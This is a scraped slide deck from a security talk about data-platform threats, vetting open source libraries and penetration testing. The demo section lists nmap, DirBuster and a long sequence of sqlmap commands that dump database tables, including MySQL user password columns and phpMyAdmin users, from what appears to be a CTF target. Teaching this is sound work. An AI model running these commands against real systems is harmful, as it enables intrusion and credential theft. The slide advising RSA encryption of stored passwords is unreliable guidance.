SlideShare ist ein Scribd-Unternehmen logo

Demystify Data Security Threats & Open Source Risks

Chetan Khatri
Chetan Khatri

The document discusses information security for data-driven platforms and open source projects. It motivates the importance of security through examples of data breaches. It covers topics like encryption, authentication, vulnerabilities in open source code, and how to evaluate open source libraries for security issues. The document demonstrates penetration testing tools like Vega and SQLMap to find vulnerabilities like SQL injection in web applications.

Technologie
1 von 72
Downloaden Sie, um offline zu lesen
Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
Information Security - Motivation Why Information Security is important?
Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
Information Security - Motivation
Information Security - Motivation
Information Security - Motivation
Source: https://www.zdnet.com/article/another-data-leak-hits-indi a-aadhaar-biometric-database/
Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
Freedom vs Force
Freedom vs Force Source: https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force Source: https://www.cnbc.com/2018/04/10/facebook-cambridge-anal ytica-a-timeline-of-the-data-hijacking-scandal.html Source: https://www.engadget.com/2019/07/24/facebook-will-pay-5-b illion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
Information Security & Potential threats with Open Source World.
Information Security & Potential threats with Open Source World. How many of you use Open Source ?
Security for Open Source world How well do you know what is inside your project?
Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
How do I choose SECURE open source packages? Have a look First look
Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
Warning Signs
Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
What to watch before using any package/library?
Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
Penetration Testing {Network, Database}
Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
Setup Proxy for Vega Tool
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Vega - Start scanning Web application
Security Scanning alert summary
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
Questions?
Hope you had a fun!
Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri

Empfohlen

Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Chetan Khatri
 
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...Agile Testing Alliance
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINTJerod Brennen
 
National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...Ajay Ohri
 
OSINT using Twitter & Python
OSINT using Twitter & PythonOSINT using Twitter & Python
OSINT using Twitter & Python37point2
 
Kush stats alpha
Kush stats alpha Kush stats alpha
Kush stats alpha Ajay Ohri
 
AI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikAI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikSergey Gordeychik
 
AI and Security
AI and SecurityAI and Security
AI and SecurityAnurag Sahay
 

Empfohlen

Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...
Data Science for Beginner by Chetan Khatri and Deptt. of Computer Science, Ka...Chetan Khatri
 
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...
#ATAGTR2019 Presentation "Security testing using ML(Machine learning), AI(Art...Agile Testing Alliance
 
What you need to know about OSINT
What you need to know about OSINTWhat you need to know about OSINT
What you need to know about OSINTJerod Brennen
 
National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...National seminar on emergence of internet of things (io t) trends and challe...
National seminar on emergence of internet of things (io t) trends and challe...Ajay Ohri
 
OSINT using Twitter & Python
OSINT using Twitter & PythonOSINT using Twitter & Python
OSINT using Twitter & Python37point2
 
Kush stats alpha
Kush stats alpha Kush stats alpha
Kush stats alpha Ajay Ohri
 
AI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikAI for security or security for AI - Sergey Gordeychik
AI for security or security for AI - Sergey GordeychikSergey Gordeychik
 
AI and Security
AI and SecurityAI and Security
AI and SecurityAnurag Sahay
 
AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtNUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityMohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionChandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic ReasoningAnton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisAnton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINTChandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in CybersecurityForcepoint LLC
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseVaticle
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessAjay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceDeep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on CybersecurityGraham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlVaticle
 
2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open StandardsAPIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdfMarceloCunha571649
 

Weitere ähnliche Inhalte

Was ist angesagt?

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtNUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityMohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionChandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic ReasoningAnton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisAnton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINTChandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in CybersecurityForcepoint LLC
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseVaticle
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessAjay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceDeep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on CybersecurityGraham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonSSIMeetup
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlVaticle
 

Was ist angesagt? (20)

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
 

Ähnlich wie Demystify Data Security Threats & Open Source Risks

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open StandardsAPIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdfMarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chanceDr. Anish Cheriyan (PhD)
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?Graham Charters
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksCiNPA Security SIG
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Moataz Kamel
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersMegan DeBlois
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsAlan Kan
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Neelu Tripathy
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecurityTao Xie
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYSylvain Martinez
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelineskarthz
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Keith Kraus
 

Ähnlich wie Demystify Data Security Threats & Open Source Risks (20)

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
